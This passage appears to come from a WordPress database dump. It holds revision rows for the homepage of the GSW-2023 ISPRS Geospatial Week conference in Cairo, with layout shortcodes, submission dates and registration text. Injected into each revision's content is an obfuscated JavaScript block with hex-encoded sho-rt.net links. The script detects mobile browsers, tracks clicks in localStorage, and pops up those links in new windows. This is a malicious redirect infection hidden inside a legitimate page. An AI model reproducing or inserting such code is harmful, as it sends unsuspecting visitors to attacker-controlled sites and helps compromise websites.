Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:13:53','2022-11-09 18:13:53','',3066,'https://gsw2023.com/?p=3182',0,'revision','',0),
(3183,1,'2022-11-09 18:17:18','2022-11-09 18:17:18','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:17:18','2022-11-09 18:17:18','',3066,'https://gsw2023.com/?p=3183',0,'revision','',0),
(3184,1,'2022-11-09 18:18:05','2022-11-09 18:18:05','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 